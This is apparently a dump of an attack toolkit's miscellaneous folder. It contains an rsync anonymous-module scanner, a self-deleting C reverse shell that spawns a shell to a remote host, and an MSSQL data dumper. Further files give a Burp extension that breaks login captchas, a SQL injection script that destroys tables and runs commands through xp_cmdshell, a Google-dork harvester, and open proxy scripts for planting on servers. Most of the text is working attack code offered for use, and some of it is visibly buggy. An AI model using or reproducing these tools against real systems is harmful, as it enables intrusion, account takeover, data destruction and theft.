12 | class ThreadGetKey(threading.Thread):
13 | def run(self):
14 | try:
15 | chr = msvcrt.getch()
16 | if chr == 'q':
17 | print "stopped by your action ( q )"
18 | os._exit(1)
19 | except:
20 | os._exit(1)
21 |
22 |
23 | def ping(ip , port , timeout=10):
24 | return 1
25 | try:
26 | cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
27 | cs.settimeout(float(timeout))
28 | address = (str(ip), int(port))
29 | status = cs.connect_ex((address))
30 | if status == NORMAL :
31 | return 1;
32 | except Exception , e:
33 | print ERROR
34 | print "error:%s" % e
35 | return ERROR
36 | cs.close()
37 | return 0
38 |
39 |
40 | def rsync(file):
41 | global host_list
42 | host_list = Queue.Queue()
43 | for host in open(file, 'r'):
44 | host_list.put(host.strip())
45 | l = host_list.qsize()
46 | threads = []
47 | if l > 0 :
48 | msg("Pentest %d hosts" % l)
49 | hander = ThreadGetKey()
50 | hander.setDaemon(True)
51 | hander.start()
52 | for i in range(20):
53 | a = RsyncCarck("xx")
54 | a.start()
55 | threads.append(a)
56 | for j in threads:
57 | j.join()
58 | else :
59 | msg("No Hosts")
60 |
61 |
62 | class RsyncCarck(threading.Thread):
63 | def __init__(self, host):
64 | threading.Thread.__init__(self)
65 | self.host = host
66 |
67 | def run(self):
68 | while 1:
69 | if host_list.empty() == True:
70 | break
71 | os.exit()
72 | time.sleep(1)
73 | host = str(host_list.get())
74 | msg("Pentest "+host+" rsync")
75 | if ping(host, 873):
76 | msg("Rsync server running", 1)
77 | rsync_client = "bin\\rsync.exe "; # rsync client path
78 | pipe = os.popen(rsync_client + host + "::")
79 | msg_text = pipe.read()
80 | pipe.close()
81 | msg_arr=[]
82 | if msg_text :
83 | msg_arr = msg_text.split('\n')
84 | if len(msg_arr) > 0:
85 | msg("%d modules Found" % len(msg_arr), 1)
86 | for module in msg_arr :
87 | if module :
88 | msg("Test %s::%s" % (host,module));
89 | module = module.strip()
90 | p = Popen(rsync_client + host + "::" + module, stdin=PIPE, stdout=PIPE)
91 | req = p.stdout.readline()
92 | if req and len(req and "@ERROR") :
93 | msg("Anonymous rsync module:" + module + " found !!!", 1)
94 | else :
95 | print req
96 | else :
97 | continue
98 | else :
99 | msg("No modules Found", 2)
100 |
101 |
102 |
103 |
104 |
105 |
106 |
--------------------------------------------------------------------------------
/misc/Reverse Shell.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | int main(int argc, char *argv[])
5 | {
6 | int fd;
7 | struct sockaddr_in sin;
8 | char rms[21]="rm -f ";
9 | daemon(1,0);
10 | sin.sin_family = AF_INET;
11 | sin.sin_port = htons(atoi(argv[2]));
12 | sin.sin_addr.s_addr = inet_addr(argv[1]);
13 | bzero(argv[1],strlen(argv[1])+1+strlen(argv[2]));
14 | fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ;
15 | if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {
16 | perror("[-] connect()");
17 | exit(0);
18 | }
19 | strcat(rms, argv[0]);
20 | system(rms);
21 | dup2(fd, 0);
22 | dup2(fd, 1);
23 | dup2(fd, 2);
24 | execl("/bin/sh","sh -i", NULL);
25 | close(fd);
26 | }
--------------------------------------------------------------------------------
/misc/YMssql.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 |
10 |
11 |
12 | #import "c:\Program Files\Common Files\System\ado\msado15.dll" no_namespace rename("EOF","EndOfFile")
13 |
14 |
15 |
16 | int main(int argc, char* argv[])
17 | {
18 | printf("[*]Mssql exploit \n");
19 |
20 |
21 |
22 | char* strSql=argv[1]; //"SELECT * from test.dbo.users";
23 | char* strFile=argv[2]; //"d.txt";
24 | int nSize=atoi(argv[3]); //3;
25 |
26 | std::ofstream log;
27 | log.open(strFile,std::ios_base::app);
28 |
29 |
30 | ::CoInitialize(NULL);
31 |
32 | _RecordsetPtr m_pRecordset("ADODB.Recordset");
33 | _ConnectionPtr m_pConnection("ADODB.Connection");
34 |
35 | _bstr_t bstrSQL(strSql);
36 |
37 | try
38 | {
39 |
40 | m_pConnection.CreateInstance("ADODB.Connection");
41 | _bstr_t strConnect = "Provider=SQLOLEDB; Server=127.0.0.1;Database=sa; uid=user; pwd=pass;";
42 | m_pConnection->Open(strConnect, "", "", adModeUnknown);
43 |
44 | printf("[+]Connect server succeed!!! \n");
45 | if (m_pConnection == NULL)
46 | {
47 | printf("Lind data ERROR!\n");
48 | }
49 | m_pRecordset.CreateInstance(__uuidof(Recordset));
50 | m_pRecordset->Open(bstrSQL, m_pConnection.GetInterfacePtr(), adOpenDynamic, adLockOptimistic, adCmdText);
51 |
52 |
53 |
54 |
55 |
56 | _variant_t PactNumber, OrigCount,username;
57 | while (!m_pRecordset->EndOfFile)
58 | {
59 | _variant_t varTmp;
60 | char strData[2048]={0};
61 | _bstr_t bstrData = "";
62 | for (long j = 0; j < nSize; j++)
63 | {
64 |
65 | varTmp = m_pRecordset ->GetCollect(_variant_t(j));
66 | if (j > 0){
67 | bstrData += ",";
68 | }
69 | bstrData+="\""+ _bstr_t(varTmp)+"\"";
70 |
71 |
72 |
73 | }
74 | log <<(char*)(_bstr_t)bstrData<<"\n";
75 | //printf("%s \n",(char*)(_bstr_t)bstrData);
76 | m_pRecordset->MoveNext();
77 |
78 |
79 | }
80 | m_pRecordset->Close();
81 | log.close();
82 |
83 |
84 | }
85 | catch (_com_error e)
86 | {
87 |
88 | printf("Error message: %s",(char*)e.Description());
89 | }
90 |
91 | if (m_pConnection->State)
92 | {
93 | m_pConnection->Close();
94 | }
95 |
96 | ::CoUninitialize();
97 |
98 |
99 |
100 | return 0;
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 | }
109 |
--------------------------------------------------------------------------------
/misc/burp_captcha_crack.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | from burp import IBurpExtender
3 | from burp import IIntruderPayloadGeneratorFactory
4 | from burp import IIntruderPayloadProcessor
5 | from burp import IIntruderPayloadGenerator
6 | from java.io import PrintWriter
7 | import random
8 | import os
9 | import uuid
10 | import os,sys
11 | import base64
12 | import hashlib
13 | import time
14 | import urllib
15 | import urllib2
16 | import json
17 | import requests
18 | import string
19 | reload(sys)
20 | sys.setdefaultencoding('utf8')
21 |
22 |
23 | # pd账号秘钥,请在用户中心页获取
24 | pd_id = ""
25 | pd_key = ""
26 | app_id = ""
27 | app_key = ""
28 | # 具体类型可以查看官方网站的价格页选择具体的类型,不清楚类型的,可以咨询客服
29 | pred_type = "30400"
30 |
31 |
32 | # hard-coded payloads
33 | # [in reality, you would use an extension for something cleverer than this]
34 |
35 |
36 | #验证码请求头
37 | headers = '''
38 | Host: ya1.com
39 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:69.0) Gecko/20100101 Firefox/69.0
40 | Accept: image/webp,*/*
41 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
42 | Accept-Encoding: gzip, deflate
43 | Connection: close
44 | Referer: http://ya1.com/cms/fastadmin/public/lf2EomShPI.php/index/login
45 | Cookie: PHPSESSID=vltk4df5fbn97vsf8mfjnobr71
46 | '''
47 |
48 | # 验证码请求地址
49 | captcha_url = "http://ya1.com/cms/fastadmin/public/index.php?s=/captcha"
50 |
51 |
52 | headers = dict([[field.strip() for field in pair.split(':', 1)] for pair in headers.strip().split('\n')])
53 |
54 | FATEA_PRED_URL = ""
55 |
56 |
57 |
58 | def LOG(log):
59 | # 不需要测试时,注释掉日志就可以了
60 | #print log
61 | log = None
62 |
63 | class TmpObj():
64 | def __init__(self):
65 | self.init = True
66 | self.value = None
67 |
68 | class Rsp():
69 | def __init__(self):
70 | self.ret_code = -1
71 | self.cust_val = 0.0
72 | self.err_msg = "succ"
73 | self.pred_rsp = TmpObj()
74 |
75 | def ParseJsonRsp(self, rsp_data):
76 | if rsp_data is None:
77 | self.err_msg = "http request failed, get rsp Nil data"
78 | return
79 | jrsp = json.loads( rsp_data)
80 | self.ret_code = string.atoi(jrsp["RetCode"])
81 | self.err_msg = jrsp["ErrMsg"]
82 | self.request_id = jrsp["RequestId"]
83 | if self.ret_code == 0:
84 | rslt_data = jrsp["RspData"]
85 | if rslt_data is not None and rslt_data != "":
86 | jrsp_ext = json.loads( rslt_data)
87 | if jrsp_ext.has_key("cust_val"):
88 | data = jrsp_ext["cust_val"]
89 | self.cust_val = string.atof(data)
90 | if jrsp_ext.has_key("result"):
91 | data = jrsp_ext["result"]
92 | self.pred_rsp.value = data
93 |
94 | def CalcSign(pd_id, passwd, timestamp):
95 | md5 = hashlib.md5()
96 | md5.update(timestamp + passwd)
97 | csign = md5.hexdigest()
98 |
99 | md5 = hashlib.md5()
100 | md5.update(pd_id + timestamp + csign)
101 | csign = md5.hexdigest()
102 | return csign
103 |
104 | def CalcCardSign(cardid, cardkey, timestamp, passwd):
105 | md5 = hashlib.md5()
106 | md5.update(passwd + timestamp + cardid + cardkey)
107 | return md5.hexdigest()
108 |
109 | def HttpRequest(url, body_data):
110 | rsp = Rsp()
111 | post_data = urllib.urlencode(body_data)
112 | request = urllib2.Request(url, post_data)
113 | request.add_header( "User-Agent", "Mozilla/5.0")
114 | rsp_data = urllib2.urlopen(request ).read()
115 | rsp.ParseJsonRsp( rsp_data)
116 | return rsp
117 |
118 | def PostFile(url, data, img_data):
119 | rsp = Rsp()
120 | files = {'img_data':('img_data', img_data)}
121 | headers = {"User-Agent": "Mozilla/5.0"}
122 | r = requests.post( url, data=data, files=files, headers = headers)
123 | rsp.ParseJsonRsp( r.text)
124 | return rsp
125 |
126 | class FateadmApi():
127 | # API接口调用类
128 | # 参数(appID,appKey,pdID,pdKey)
129 | def __init__(self, app_id, app_key, pd_id, pd_key):
130 | self.app_id = app_id
131 | if app_id is None:
132 | self.app_id = ""
133 | self.app_key = app_key
134 | self.pd_id = pd_id
135 | self.pd_key = pd_key
136 | self.host = FATEA_PRED_URL
137 |
138 | def SetHost(self, url):
139 | self.host = url
140 | #
141 | # 查询余额
142 | # 参数:无
143 | # 返回值:
144 | # rsp.ret_code:正常返回0
145 | # rsp.cust_val:用户余额
146 | # rsp.err_msg:异常时返回异常详情
147 | #
148 | def QueryBalc(self):
149 | tm = str( int(time.time()))
150 | sign = CalcSign( self.pd_id, self.pd_key, tm)
151 | param = {
152 | "user_id": self.pd_id,
153 | "timestamp": tm,
154 | "sign": sign
155 | }
156 | url = self.host + "/api/custval"
157 | rsp = HttpRequest(url, param)
158 | if rsp.ret_code == 0:
159 | LOG("query succ ret: {} cust_val: {} rsp: {} pred: {}".format( rsp.ret_code, rsp.cust_val, rsp.err_msg, rsp.pred_rsp.value))
160 | else:
161 | LOG("query failed ret: {} err: {}".format( rsp.ret_code, rsp.err_msg.encode('utf-8')))
162 | return rsp
163 |
164 | #
165 | # 查询网络延迟
166 | # 参数:pred_type:识别类型
167 | # 返回值:
168 | # rsp.ret_code:正常返回0
169 | # rsp.request_id:唯一的订单号
170 | # rsp.err_msg: 异常时返回异常详情
171 | #
172 | def QueryTTS(self, pred_type):
173 | tm = str( int(time.time()))
174 | sign = CalcSign( self.pd_id, self.pd_key, tm)
175 | param = {
176 | "user_id": self.pd_id,
177 | "timestamp": tm,
178 | "sign": sign,
179 | "predict_type": pred_type,
180 | }
181 | if self.app_id != "":
182 | #
183 | asign = CalcSign(self.app_id, self.app_key, tm)
184 | param["appid"] = self.app_id
185 | param["asign"] = asign
186 | url = self.host + "/api/qcrtt"
187 | rsp = HttpRequest(url, param)
188 | if rsp.ret_code == 0:
189 | LOG("query rtt succ ret: {} request_id: {} err: {}".format( rsp.ret_code, rsp.request_id, rsp.err_msg))
190 | else:
191 | LOG("predict failed ret: {} err: {}".format( rsp.ret_code, rsp.err_msg.encode('utf-8')))
192 | return rsp
193 |
194 | #
195 | # 识别验证码
196 | # 参数:pred_type:识别类型 img_data:图片的数据
197 | # 返回值:
198 | # rsp.ret_code:正常返回0
199 | # rsp.request_id:唯一订单号
200 | # rsp.pred_rsp.value:识别结果
201 | # rsp.err_msg:异常时返回异常详情
202 | #
203 | def Predict(self, pred_type, img_data):
204 | tm = str( int(time.time()))
205 | sign = CalcSign( self.pd_id, self.pd_key, tm)
206 | param = {
207 | "user_id": self.pd_id,
208 | "timestamp": tm,
209 | "sign": sign,
210 | "predict_type": pred_type,
211 | "up_type": "mt"
212 | }
213 | if self.app_id != "":
214 | #
215 | asign = CalcSign(self.app_id, self.app_key, tm)
216 | param["appid"] = self.app_id
217 | param["asign"] = asign
218 | url = self.host + "/api/capreg"
219 | files = img_data
220 | rsp = PostFile(url,param,files)
221 | if rsp.ret_code == 0:
222 | LOG("predict succ ret: {} request_id: {} pred: {} err: {}".format( rsp.ret_code, rsp.request_id, rsp.pred_rsp.value, rsp.err_msg))
223 | else:
224 | LOG("predict failed ret: {} err: {}".format( rsp.ret_code, rsp.err_msg.encode('utf-8')))
225 | if rsp.ret_code == 4003:
226 | #lack of money
227 | LOG("cust_val <= 0 lack of money, please charge immediately")
228 | return rsp
229 |
230 | #
231 | # 从文件进行验证码识别
232 | # 参数:pred_type;识别类型 file_name:文件名
233 | # 返回值:
234 | # rsp.ret_code:正常返回0
235 | # rsp.request_id:唯一订单号
236 | # rsp.pred_rsp.value:识别结果
237 | # rsp.err_msg:异常时返回异常详情
238 | #
239 | def PredictFromFile( self, pred_type, file_name):
240 | with open(file_name, "rb") as f:
241 | data = f.read()
242 | return self.Predict(pred_type,data)
243 |
244 |
245 | #
246 | # 识别失败,进行退款请求
247 | # 参数:request_id:需要退款的订单号
248 | # 返回值:
249 | # rsp.ret_code:正常返回0
250 | # rsp.err_msg:异常时返回异常详情
251 | #
252 | # 注意:
253 | # Predict识别接口,仅在ret_code == 0时才会进行扣款,才需要进行退款请求,否则无需进行退款操作
254 | # 注意2:
255 | # 退款仅在正常识别出结果后,无法通过网站验证的情况,请勿非法或者滥用,否则可能进行封号处理
256 | #
257 | def Justice(self, request_id):
258 | if request_id == "":
259 | #
260 | return
261 | tm = str( int(time.time()))
262 | sign = CalcSign( self.pd_id, self.pd_key, tm)
263 | param = {
264 | "user_id": self.pd_id,
265 | "timestamp":tm,
266 | "sign":sign,
267 | "request_id":request_id
268 | }
269 | url = self.host + "/api/capjust"
270 | rsp = HttpRequest(url, param)
271 | if rsp.ret_code == 0:
272 | LOG("justice succ ret: {} request_id: {} pred: {} err: {}".format( rsp.ret_code, rsp.request_id, rsp.pred_rsp.value, rsp.err_msg))
273 | else:
274 | LOG("justice failed ret: {} err: {}".format( rsp.ret_code, rsp.err_msg.encode('utf-8')))
275 | return rsp
276 |
277 | #
278 | # 充值接口
279 | # 参数:cardid:充值卡号 cardkey:充值卡签名串
280 | # 返回值:
281 | # rsp.ret_code:正常返回0
282 | # rsp.err_msg:异常时返回异常详情
283 | #
284 | def Charge(self, cardid, cardkey):
285 | tm = str( int(time.time()))
286 | sign = CalcSign( self.pd_id, self.pd_key, tm)
287 | csign = CalcCardSign(cardid, cardkey, tm, self.pd_key)
288 | param = {
289 | "user_id": self.pd_id,
290 | "timestamp":tm,
291 | "sign":sign,
292 | 'cardid':cardid,
293 | 'csign':csign
294 | }
295 | url = self.host + "/api/charge"
296 | rsp = HttpRequest(url, param)
297 | if rsp.ret_code == 0:
298 | LOG("charge succ ret: {} request_id: {} pred: {} err: {}".format( rsp.ret_code, rsp.request_id, rsp.pred_rsp.value, rsp.err_msg))
299 | else:
300 | LOG("charge failed ret: {} err: {}".format( rsp.ret_code, rsp.err_msg.encode('utf-8')))
301 | return rsp
302 |
303 | ##
304 | # 充值,只返回是否成功
305 | # 参数:cardid:充值卡号 cardkey:充值卡签名串
306 | # 返回值: 充值成功时返回0
307 | ##
308 | def ChargeExtend(self, cardid, cardkey):
309 | return self.Charge(cardid,cardkey).ret_code
310 |
311 | ##
312 | # 调用退款,只返回是否成功
313 | # 参数: request_id:需要退款的订单号
314 | # 返回值: 退款成功时返回0
315 | #
316 | # 注意:
317 | # Predict识别接口,仅在ret_code == 0时才会进行扣款,才需要进行退款请求,否则无需进行退款操作
318 | # 注意2:
319 | # 退款仅在正常识别出结果后,无法通过网站验证的情况,请勿非法或者滥用,否则可能进行封号处理
320 | ##
321 | def JusticeExtend(self, request_id):
322 | return self.Justice(request_id).ret_code
323 |
324 | ##
325 | # 查询余额,只返回余额
326 | # 参数:无
327 | # 返回值:rsp.cust_val:余额
328 | ##
329 | def QueryBalcExtend(self):
330 | rsp = self.QueryBalc()
331 | return rsp.cust_val
332 |
333 | ##
334 | # 从文件识别验证码,只返回识别结果
335 | # 参数:pred_type;识别类型 file_name:文件名
336 | # 返回值: rsp.pred_rsp.value:识别的结果
337 | ##
338 | def PredictFromFileExtend( self, pred_type, file_name):
339 | rsp = self.PredictFromFile(pred_type,file_name)
340 | return rsp.pred_rsp.value
341 |
342 | ##
343 | # 识别接口,只返回识别结果
344 | # 参数:pred_type:识别类型 img_data:图片的数据
345 | # 返回值: rsp.pred_rsp.value:识别的结果
346 | ##
347 | def PredictExtend(self,pred_type, img_data):
348 | rsp = self.Predict(pred_type,img_data)
349 | return rsp.pred_rsp.value
350 |
351 |
352 |
353 | class BurpExtender(IBurpExtender, IIntruderPayloadGeneratorFactory, IIntruderPayloadProcessor):
354 |
355 | #
356 | # implement IBurpExtender
357 | #
358 |
359 | def registerExtenderCallbacks(self, callbacks):
360 | # obtain an extension helpers object
361 | self._helpers = callbacks.getHelpers()
362 |
363 | # set our extension name
364 | callbacks.setExtensionName("Captcha Crack")
365 |
366 |
367 |
368 |
369 |
370 | # register ourselves as an Intruder payload generator
371 | callbacks.registerIntruderPayloadGeneratorFactory(self)
372 |
373 | # register ourselves as an Intruder payload processor
374 | callbacks.registerIntruderPayloadProcessor(self)
375 |
376 | #
377 | # implement IIntruderPayloadGeneratorFactory
378 | #
379 |
380 | def getGeneratorName(self):
381 | return "Captcha Crack"
382 |
383 | def createNewInstance(self, attack):
384 | # return a new IIntruderPayloadGenerator to generate payloads for this attack
385 | return IntruderPayloadGenerator()
386 |
387 | #
388 | # implement IIntruderPayloadProcessor
389 | #
390 |
391 | def getProcessorName(self):
392 | return "Serialized input wrapper"
393 |
394 | def processPayload(self, currentPayload, originalPayload, baseValue):
395 | # decode the base value
396 | dataParameter = self._helpers.bytesToString(
397 | self._helpers.base64Decode(self._helpers.urlDecode(baseValue)))
398 |
399 | # parse the location of the input string in the decoded data
400 | start = dataParameter.index("input=") + 6
401 | if start == -1:
402 | return currentPayload
403 |
404 | prefix = dataParameter[0:start]
405 | end = dataParameter.index("&", start)
406 | if end == -1:
407 | end = len(dataParameter)
408 |
409 | suffix = dataParameter[end:len(dataParameter)]
410 |
411 | # rebuild the serialized data with the new payload
412 | dataParameter = prefix + self._helpers.bytesToString(currentPayload) + suffix
413 | return self._helpers.stringToBytes(
414 | self._helpers.urlEncode(self._helpers.base64Encode(dataParameter)))
415 |
416 | #
417 | # class to generate payloads from a simple list
418 | #
419 |
420 | class IntruderPayloadGenerator(IIntruderPayloadGenerator):
421 | def __init__(self):
422 | self._payloadIndex = 0
423 |
424 | def hasMorePayloads(self):
425 | return True
426 |
427 | def getNextPayload(self, baseValue):
428 | req = urllib2.Request(captcha_url, headers=headers)
429 | response = urllib2.urlopen(req)
430 | filename = "./tmp/"+str(uuid.uuid1())+".png"
431 | with open(filename, "wb") as f:
432 | f.write(response.read())
433 | #上传到打码平台识别
434 | api = FateadmApi(app_id, app_key, pd_id, pd_key)
435 | rsp = api.PredictFromFile(pred_type, filename) # 返回识别结果的详细信息
436 | payload = rsp.pred_rsp.value
437 | return payload
438 |
439 | def reset(self):
440 | self._payloadIndex = 0
441 |
--------------------------------------------------------------------------------
/misc/gettitle.py:
--------------------------------------------------------------------------------
1 | import sys, urllib2, time, os , Queue, threading,re
2 |
3 | def cslogo():
4 | print '''
5 | ___ ___ ____ ____ ____ __ __ _ _
6 | / __)/ _ \( _ \( ___)( _ \( ) /__\ ( \/ )
7 | ( (__( (_) ))(_) ))__) )___/ )(__ /(__)\ \ /
8 | \___)\___/(____/(____)(__) (____)(__)(__)(__)
9 | Name:get title exploit
10 |
11 | '''
12 |
13 | # show message
14 | def msg(text, type=0):
15 | if type == 0:
16 | str_def = "[*]"
17 | elif type == 1:
18 | str_def = "[+]"
19 | else:
20 | str_def = "[-]";
21 | print str_def + text;
22 |
23 | def find_text(text, start, end):
24 | regex = '%s(.*?)%s' % (start, end)
25 | text_re = re.search(regex, text)
26 | if text_re is None :
27 | return "none"
28 | return text_re.group(1)
29 |
30 | def gbk2utf8(text):
31 | data=unicode(text,"gb2312")
32 | return data.encode("utf-8")
33 |
34 | # get url data
35 | def get(url):
36 | try:
37 | r = urllib2.urlopen(url, timeout=20)
38 | return r.read()
39 | except :
40 | return "none"
41 |
42 | def post(url,data):
43 | try:
44 | r = urllib2.urlopen(url,data,timeout=30)
45 | return r.read();
46 | except urllib2.HTTPError, error:
47 | return error.read()
48 | def file_to_arr(file):
49 | arr=[]
50 | f = open(file)
51 | for line in f:
52 | arr.append(line.strip())
53 | return arr
54 |
55 |
56 | def exploit(i):
57 | html=get("http://"+i).lower()
58 | if html != "none" :
59 | print i+" - "+find_text(html,"","")+"\r";
60 |
61 | return
62 | class Worker(threading.Thread):
63 | def __init__(self):
64 | threading.Thread.__init__(self)
65 | def run(self):
66 | while 1:
67 | if data_queue.empty() == True:
68 | break
69 | exploit(data_queue.get());
70 |
71 |
72 | if __name__ == '__main__':
73 |
74 | cslogo()
75 | msg("Get Title exploit")
76 |
77 | file=sys.argv[1]
78 | arr=file_to_arr(file)
79 | thread=int(sys.argv[2])
80 | thread= thread if thread< len(arr) else len(arr)
81 | msg("file:%s iplist:%d thread:%s" % (file,len(arr),thread))
82 | global data_queue
83 | data_queue = Queue.Queue()
84 | msg("generate ip queue ...")
85 | for i in arr :
86 | data_queue.put(i)
87 | for t in range(thread):
88 | Worker().start()
89 | sys.exit(0)
90 |
--------------------------------------------------------------------------------
/misc/google.php:
--------------------------------------------------------------------------------
1 | #!/usr/bin/php
2 | .*/im';
11 | preg_match_all($preg, $content, $m);
12 | preg_match_all('/(.*?)/', $m[0][0], $ms);
13 |
14 | $list = array();
15 | foreach ($ms[1] as $link)
16 | {
17 | preg_match('/http:\/\/[a-zA-Z0-9._-]*/', $link, $matches);
18 | if (!empty($matches[0]))
19 | {
20 | $list[] = $matches[0];
21 | }
22 | }
23 | $list = array_unique($list);
24 | return $list;
25 | }
26 |
27 |
28 |
29 |
30 | $GOOGLEDORK = "inurl:news.php;
31 |
32 | echo "Result file [Enter for None]: \r\n";
33 | $result = trim(fgets(STDIN));
34 |
35 | if($result==NULL){$result=_RESULT;}
36 |
37 |
38 | if(file_exists("$result")){
39 | @unlink("$result");
40 | echo "Clear Cache ...\r\n";
41 | }
42 |
43 |
44 |
45 | $page = 20;
46 | $num = 100;
47 | for ($i=1;$i<=$page;$i++)
48 | {
49 | $url = geturl($GOOGLEDORK, $i, $num);
50 | print_r('[+] Page: '.$i.' Results Count: '.count($url)."\r\n");
51 | foreach ($url as $u)
52 | {
53 | #print_r($u."\r\n");
54 | @$fp=@fopen('tmp','a');
55 | @fwrite($fp,$u."\r\n");
56 | @fclose($fp);
57 |
58 | }
59 | }
60 | $new_filename="$result";
61 | $file=file('tmp');
62 | $array=preg_replace('/($\s*$)|(^\s*^)/m','',$file);
63 | foreach ($array as $key=>$r){
64 |
65 | $array[$key]=trim("$r");
66 |
67 | }
68 | $names=dirname(__FILE__).DIRECTORY_SEPARATOR.$new_filename;
69 | $new_array=array_values(array_unique($array));
70 |
71 | if(file_put_contents("$new_filename",join("\r\n",$new_array)))
72 |
73 | {
74 | echo "Get Subdomain Success!\r\n\r\n";
75 | usleep(100000);
76 | echo "Save To:\r\n". $names."\r\n\r\n";
77 |
78 |
79 | if(file_exists('tmp'))
80 | {
81 | @unlink('tmp');
82 | echo "Clear Cache ...\r\n\r\n";
83 |
84 | }
85 | }else {
86 | echo "\r\n[!] Failed! Connect Google Error!\r\n ";
87 | echo "\r\n[-] Plase Proxy...\r\n";
88 | }
89 |
90 |
91 | exit;
92 | ?>
93 |
--------------------------------------------------------------------------------
/misc/mssql-sql-inject-execute.py:
--------------------------------------------------------------------------------
1 | import sys, urllib2, time, os , Queue, threading,re,string
2 |
3 | def cslogo():
4 | print '''
5 | ___ ___ ____ ____ ____ __ __ _ _
6 | / __)/ _ \( _ \( ___)( _ \( ) /__\ ( \/ )
7 | ( (__( (_) ))(_) ))__) )___/ )(__ /(__)\ \ /
8 | \___)\___/(____/(____)(__) (____)(__)(__)(__)
9 | Name:get title exploit
10 |
11 | '''
12 |
13 | # show message
14 | def msg(text, type=0):
15 | if type == 0:
16 | str_def = "[*]"
17 | elif type == 1:
18 | str_def = "[+]"
19 | else:
20 | str_def = "[-]";
21 | print str_def + text;
22 |
23 | def find_text(text, start, end):
24 | regex = '%s(.*)%s' % (start, end)
25 | text_re = re.search(regex, text)
26 | if text_re is None :
27 | return "none"
28 | return text_re.group(1)
29 |
30 | def gbk2utf8(text):
31 | data=unicode(text,"gb2312")
32 | return data.encode("utf-8")
33 |
34 | # get url data
35 | def get(url):
36 | try:
37 | r = urllib2.urlopen(url, timeout=20)
38 | return r.read()
39 | except :
40 | return "none"
41 |
42 | def post(url,data):
43 | try:
44 | opener = urllib2.build_opener()
45 | opener.addheaders.append(('Cookie', '__utma=79235852.287466356.1385124666.1385124666.1385213546.2; __utmz=79235852.1385124666.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAQDRACBC=OJMFPBPBILEDANAEOPGAMIGL; st8id=1e1bcc1010b6de32734c584317443b31.00.cc781be5683b8a8f6de679b0911732d2; ASPSESSIONIDCQBRBCBD=CGGBLCJCFMAAGPFKJAEEHAOC; ASPSESSIONIDCQARBDBD=JLKPAILCMMBNGNGDLLPLFKGH; ASPSESSIONIDAQATDAAC=MGHBOLDDOLLGPOHMDBMDLDIL'))
46 | r = opener.open(url,data,timeout=30)
47 | return r.read();
48 | except urllib2.HTTPError, error:
49 | return error.read()
50 |
51 |
52 | if __name__ == '__main__':
53 |
54 | cslogo()
55 | cmd=sys.argv[1];
56 | msg("mssql sql cmd exploit")
57 | #create thread= thread if thread< len(arr) else len(arr)
58 | post("http://xxx.com/news.asp","iid=100%27%20and%201=2%20%20%u0075nion%20all%20%u0073elect%20%201,2,(%u0073elect%20count(*)%20%20from%20employee),4%20;DROP%20TABLE%20xxoo;create%20table%20xxoo(id%20int%20identity(1,1),dir%20ntext);--")
59 | #execute
60 | post("http://xxx.com/news.asp","iid=100%27%20and%201=2%20%20%u0075nion%20all%20%u0073elect%20%201,2,(%u0073elect%20count(*)%20%20from%20xxoo),4%20;insert%20xxoo%20exec%20%u004daster.dbo.%u0078p_cmdshell%20'"+cmd+"'; --")
61 | #fetch count
62 | html=post("http://xxx.com/news.asp","iid=100%27%20and%201=2%20%20%u0075nion%20all%20%u0073elect%20%201,2,(%u0073elect%20count(*)%20%20from%20xxoo),4%20;--")
63 | i=find_text(html,'','')
64 | where="%20where%20id=1),4%20;--";
65 | res="none";
66 | if i != "none" :
67 | msg("result rows: %s" % i);
68 | for t in range(int(i)):
69 | where="%20where%20id="+str(t)+"),4%20;--";
70 | html=post("http://xxx.com/news.asp","iid=100%27%20and%201=2%20%20%u0075nion%20all%20%u0073elect%20%201,2,(%u0073elect%20top%201%20dir%20from%20xxoo"+where)
71 | res=find_text(html,'','')
72 | print res
73 |
74 |
75 |
76 |
--------------------------------------------------------------------------------
/misc/php-ftp.php:
--------------------------------------------------------------------------------
1 |
10 |
--------------------------------------------------------------------------------
/misc/proxy.asp:
--------------------------------------------------------------------------------
1 | <%
2 |
3 | Set objXML = Server.CreateObject("MSXML2.ServerXMLHTTP")
4 | objXML.open "GET",request("url"),false
5 |
6 | objXML.send()
7 |
8 | response.write objXML.responseText
9 |
10 | %>
--------------------------------------------------------------------------------
/misc/proxy.cfm:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 | #cfhttp.filecontent#
11 |
12 |
--------------------------------------------------------------------------------
/misc/proxy.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=utf-8"%>
2 | <%
3 | String sCurrentLine;
4 | String sTotalString;
5 | sCurrentLine="";
6 | sTotalString="";
7 | String url=request.getParameter("u");
8 | java.io.InputStream l_urlStream;
9 | java.net.URL l_url = new java.net.URL(url);
10 | java.net.HttpURLConnection l_connection = (java.net.HttpURLConnection) l_url.openConnection();
11 | l_connection.connect();
12 | l_urlStream = l_connection.getInputStream();
13 | java.io.BufferedReader l_reader = new java.io.BufferedReader(new java.io.InputStreamReader(l_urlStream,"utf-8"));
14 | while ((sCurrentLine = l_reader.readLine()) != null)
15 | {
16 | sTotalString+=sCurrentLine;
17 | }
18 | out.println(sTotalString);
19 | %>
--------------------------------------------------------------------------------
/misc/proxy.php:
--------------------------------------------------------------------------------
1 | Type:$rtype Url:$curl
";
16 |
17 | switch ($rtype) {
18 | case "get" : get($curl); break;
19 | case "post" : post($curl,$_GET); break;
20 |
21 | }
22 |
23 |
24 |
25 |
26 | }else{
27 |
28 | echo "[+] php cute proxy script
http https get post file ftp ";
29 |
30 | }
31 |
32 | function get($url){
33 |
34 | echo file_get_contents($url);
35 |
36 | }
37 |
38 |
39 | function post($url, $post = null)
40 | {
41 |
42 | $context = array();
43 |
44 | if (is_array($post))
45 | {
46 | ksort($post);
47 |
48 | $context['http'] = array
49 | (
50 | 'method' => 'POST',
51 | 'content' => http_build_query($post, '', '&'),
